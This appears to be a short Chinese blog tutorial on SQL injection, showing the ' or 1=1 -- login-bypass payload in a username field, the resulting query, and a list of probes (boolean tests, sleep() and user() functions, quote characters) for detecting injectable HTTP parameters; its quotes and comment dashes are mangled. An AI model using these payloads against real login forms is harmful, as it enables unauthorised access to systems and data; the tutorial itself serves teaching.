type
status
date
slug
summary
tags
category
icon
password
通过在用户名处传入参数’ or 1=1 - - ’ 进行万能密码登录
SELECT username,password FROM users WHERE username=’textvalue’ or 1=1 - - ‘ AND password=’textvalue2’
- 输入字符
formusr = ‘ or 1=1 - -
formpwd = anything
- 实际的查询代码
SELECT * FROM users WHERE username= ’’ or 1=1 - - AND password = ‘anything’
判断一个HTTP请求是否存在SQL注入的方式
- 经典:and 1=1 | and 2 > 1 | or 1 = 1 | or 1 < 1
- 数据库函数:sleep(4) = 1 | length(user()) > 3
- 特殊符号:单引号(‘)双引号 (“)
- Author:KingCode
- URL:https://kingcode.dpdns.org/article/6352db5f-1399-407c-a188-8f545616dc82
- Copyright:All articles in this blog, except for special statements, adopt BY-NC-SA agreement. Please indicate the source!
